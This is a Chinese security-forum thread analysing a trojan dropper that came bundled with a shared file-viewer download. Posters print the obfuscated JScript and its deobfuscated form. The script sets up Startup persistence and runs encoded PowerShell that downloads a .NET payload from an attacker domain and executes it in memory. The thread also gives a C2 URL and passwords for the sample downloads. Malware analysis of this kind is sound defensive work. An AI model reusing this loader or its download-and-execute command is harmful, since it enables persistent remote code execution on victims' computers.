吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 4533|回复: 15
收起左侧

[PC样本分析] 新人分析,不到之处还请见谅

[复制链接]
紫云互联 发表于 2022-1-2 20:43
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
FileViewPro 万能查看器绿色版
https://www.52pojie.cn/thread-1059431-1-1.html
(出处: 吾爱破解论坛)

样本连接:https://wwi.lanzouw.com/im1KLya83mh 密码:52pj

@三木森啊
该用户上传的软件捆绑木马病毒,通过360查出
image.png

在线查毒:https://www.virustotal.com/gui/file/a8bb13a0dcec03fb452a53e985285b74c511eb7daacb9daa22dbb647705fba9b
VirusTotal-a8bb13a0dcec03fb452a53e985285b.png
接下来开始进行解包
image.png
[JavaScript] 纯文本查看 复制代码
ERUJHTSETJSEJSEA = function(ObjN) {
  ResName = new ActiveXObject(ObjN);
  return ResName;
};
WScript.Sleep(5005);
function ASDGHKFIASYLWGHAfi(str) {
   
    splitString = str.split(""); 
  
 
   
    reverseArray = splitString.reverse(); 
   
 
   
    joinArray = reverseArray.join(""); 
 
   
    return joinArray; 
};

aq = ASDGHKFIASYLWGHAfi("sj.muimorhC\\atadppa\\");

WScript.Sleep(2002);

SETYa = ASDGHKFIASYLWGHAfi("tAFIFcejAFIFbOmetAFIFsySelAFIFiF.gAFIFniAFIFtpirAFIFcS");

SETYaa = SETYa.replace(/FIFA/g, '');

fso=WScript.CreateObject (SETYaa); 

zr = fso.FileExists(aq); if (zr == false) {



WScript.Sleep(2002);
SETYs = ASDGHKFIASYLWGHAfi("llAFIFeAFIFhS.tpiAFIFrcAFIFSW");

SETYss = SETYs.replace(/FIFA/g, '');

wscr = new ERUJHTSETJSEJSEA(SETYss); 

fso.CopyFile (WScript.ScriptFullName, wscr.ExpandEnvironmentStrings(ASDGHKFIASYLWGHAfi("%ELIFORPRESU%")) + aq , true);


WScript.Sleep(8008);




link = wscr.SpecialFolders(ASDGHKFIASYLWGHAfi("putratS"))+ASDGHKFIASYLWGHAfi("\\")+ASDGHKFIASYLWGHAfi("knl.ini.muimorhC");

shortcut = wscr.CreateShortcut(link);

shortcut.TargetPath = ASDGHKFIASYLWGHAfi("%ELIFORPRESU%") + aq;

shortcut.Arguments = ASDGHKFIASYLWGHAfi(ASDGHKFIASYLWGHAfi(""));
WScript.Sleep(1000);
shortcut.Description = ASDGHKFIASYLWGHAfi("ini.muimorhC");

shortcut.IconLocation = ASDGHKFIASYLWGHAfi("96,lld.23LLEHS\\23metsys\\%tooRmetsyS%");

shortcut.WindowStyle = 4;

shortcut.Save();

}

WScript.Sleep(8008);
try { setTimeout(ASDGHKFIASYLWGHAfi(ASDGHKFIASYLWGHAfi("")),888); } catch(f) {
SETYy = ASDGHKFIASYLWGHAfi("eAFIFxAFIFeAFIF.lAFIFleAFIFhsAFIFrewAFIFoPAFIF");

SETYyy = SETYy.replace(/FIFA/g, '');
C=SETYyy;


BB=ASDGHKFIASYLWGHAfi(" e- tixeon- ");

SD=ASDGHKFIASYLWGHAfi("wGADBgYAUGAXBgLAQHAlBgTAcCAgAAdAMGAlBgaAIGAPBQLAcHAlBgTAgCAoAwZA4GApBgcAQHATBANAYDAlBwcAEGAiBQbA8GAyBgRAoDA6AQXAQHAyBQZAYHAuBwbAMEAbBAKAQGAhBwbAwEAuAgbAkGAhBQbA8GAEBAdA4GAlBgcAIHA1BwQAoDA6AQXA4GApBQYA0GAvBARAAHAwBQQAsFAgAwOAgDAgAAcAUGAlBAbAMHAgAAI");

SV=ASDGHKFIASYLWGHAfi("GAwBQZAIHAuAQKAcCAzAAcA0GAuAgYA8CA0BQaAIGAvAQZAMGAhBAcAMHAuAgaAMHAzBQaAMHAvAwLAoDAwBAdAQHAoBwJAgCAnAwZA4GApBgcAQHATBAZAEGAvBAbA4GA3BwbAQEAnAgLAkCAnAAdA4GAlBQaA");

SF=ASDGHKFIASYLWGHAfi("AkCAsBAbAUHAuBAJAwCAsBAbAUHAuBAJAgCAlBwaA8GA2BgbAkGAuAAdA4GApBwbAAFA5BgcAQHAuBQRA4CApAQKAkCAnAQQAcCAsAwJA4HAhAgKA4FAnAAKAUGAjBQYAw");

wscr.Run(C+BB+SD+SV+SF,0,false);

};

木马文件就是ID.js

免费评分

参与人数 1吾爱币 +7 热心值 +1 收起 理由
Hmily + 7 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

涛之雨 发表于 2022-1-10 21:36
本帖最后由 涛之雨 于 2022-4-1 11:15 编辑

根据举报直接以压缩包方式打开样本提取js附件,

查看js代码,简单解密(转置、拼接)

分析代码逻辑

CreateActiveXObject = function (ObjN) {
    ResName = new ActiveXObject(ObjN);
    return ResName;
};
WScript.Sleep(5005);
aq = "\\appdata\\Chromium.js";
WScript.Sleep(2002);
fso = WScript.CreateObject('Scripting.FileSystemObject');
zr = fso.FileExists(aq);
if (zr == false) {
    WScript.Sleep(2002);
    wscr = new CreateActiveXObject('WScript.Shell');
    fso.CopyFile(WScript.ScriptFullName, wscr.ExpandEnvironmentStrings("%USERPROFILE%") + aq, true);
    WScript.Sleep(8008);
    link = wscr.SpecialFolders("Startup") + "\\" + "Chromium.ini.lnk";
    shortcut = wscr.CreateShortcut(link);
    shortcut.TargetPath = "%USERPROFILE%" + aq;
    shortcut.Arguments = "";
    WScript.Sleep(1000);
    shortcut.Description = "Chromium.ini";
    shortcut.IconLocation = "%SystemRoot%\\system32\\SHELL32.dll,69";
    shortcut.WindowStyle = 4;
    shortcut.Save();
}
WScript.Sleep(8008);
try {
    setTimeout("", 888);
} catch (f) {
    C = 'Powershell.exe';
    BB = " -noexit -e ";
    SD = "IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgACcATgBlAHQALgBXAGUAYgBDAGw";
    SV = "AaQBlAG4AdAAnACkALgAnAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAnACgAJwBoAHQAdABwADoALwAvAHMAaQBzAHMAagAuAHMAcABhAGMAZQAvAGIAaQB0AC8AYgAuAG0AcAAzACcAKQAuAHIAZQBwAG";
    SF = "wAYQBjAGUAKAAnAF4AKgAhAH4AJwAsACcAQQAnACkAKQApAC4ARQBuAHQAcgB5AFAAbwBpAG4AdAAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABuAHUAbABsACkA";
    wscr.Run(C + BB + SD + SV + SF, 0, false);
};

其中,检测%USERPROFILE%\\appdata\\Chromium.js是否存在病毒js本身,

不存在则复制到该位置,并且在开始菜单创建快捷方式

setTimeout("", 888);因为参数错误,执行catch异常捕捉的代码

拼接执行powershell下载并且运行病毒(其实这个代码也有问题。。。

ActiveX对象是在if中才创建的

只有第一次运行时创建快捷方式才会创建,因此之后都会报错而运行错误。。。

下面看powershell执行的内容

拼接后的字符串为:

Powershell.exe -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgACcATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAAnACkALgAnAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAnACgAJwBoAHQAdABwADoALwAvAHMAaQBzAHMAagAuAHMAcABhAGMAZQAvAGIAaQB0AC8AYgAuAG0AcAAzACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AKgAhAH4AJwAsACcAQQAnACkAKQApAC4ARQBuAHQAcgB5AFAAbwBpAG4AdAAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABuAHUAbABsACkA

查询powershell的帮助,-e参数为base-64编码后的字符串

使用atob解码发现似乎是”乱码”,

L7XVC(BKFHYFJXK4O(BNCDJ.png

看形式像是unicode编码(4字节),

因全都是ascii码,直接以\x00分割后拼接,

image.png

得到powershell中执行的代码

  sleep 8; [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String((New-Object 'Net.WebClient').'DownloadString'('http://sissj.space/bit/b.mp3').replace('^*!~','A'))).EntryPoint.invoke($null,$null)

(稍微格式化一下)

sleep 8;
[AppDomain]::CurrentDomain.Load(
    [Convert]::Frombase64String(
        (New-Object 'Net.WebClient')
        .'DownloadString'('http://sissj.space/bit/b.mp3')
        .replace('^*!~','A')
    )
).EntryPoint.invoke($null,$null)

应该是获取b.mp3的字符串替换符号后保存,
默认方式打开(应该就是执行这个保存后的文件)

可惜现在网站已经打不开了,不知道网站上什么时候没有的,也不知道服务器上的代码有什么危害,

病多危险期应该是2019-10-14之后,截止时间不详。

因此目前看来暂时是不用紧张,但是最好还是不要使用(或者用压缩软件打开,解压后执行其中的exe)

image.png

(刚刚看到有朋友找到了这个b.mp3文件,继续继续)

文本复制,把^*!~全部替换成A,base64解码,保存

因为base64里有非ASCII码,atob会报错。。。

我这里用的base64.us,或者可以用我之前搜罗来的纯js的base64.js

我这里用blob构建下载

//复制了前面几个hex编码意思一下

var x='4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF'.split(' ')//分割成hex
var c=new Uint8Array(x.map(a=>Number('0x'+a)))//转换成uint8Array
var cao=URL.createObjectURL(new Blob([c]))//创建blob临时URL
document.write('<a href="'+cao+'" download="file.zip">111</a>')//创建下载a链接

点一下就可以下载了

(然后就被拦截了=_=)

(我把magic头给删了才保存下来=_=)

下载下来重新16进制编辑回来

然后就可以继续分析了

.Net(C#)编写的,直接丢dnSpy

又是服务器emmm

看一下请求链接:

(果然,有需要分析的自己玩吧)

hxxp://sissj[dot]space/8/gate[dot]php

附件丢上来吧,解压密码:5ZC+54ix56C06Kej

(没错就是base64,本来想md5的=_=)

file.zip (5.88 KB, 下载次数: 0)


免费评分

参与人数 1吾爱币 +1 热心值 +1 收起 理由
Hmily + 1 + 1 用心讨论,共获提升!

查看全部评分

Hmily 发表于 2022-1-4 10:49
peanut98 发表于 2022-1-4 13:11
吃一顿好的 发表于 2022-1-4 14:03
厉害 真谦虚
 楼主| 紫云互联 发表于 2022-1-5 13:47

这个帖子软件好多人都使用了,不知道害了多少人了
hailaoda 发表于 2022-1-5 15:31
厉害,膜拜大神带路。
pxsweet 发表于 2022-1-6 10:36
厉害了,资深大神才看得懂吧
小小的石头13 发表于 2022-1-8 21:10
js也解密一下吧,看着还是有点懵
wiliao123 发表于 2022-1-13 00:23
小白完全看不懂
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-3-29 17:14

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表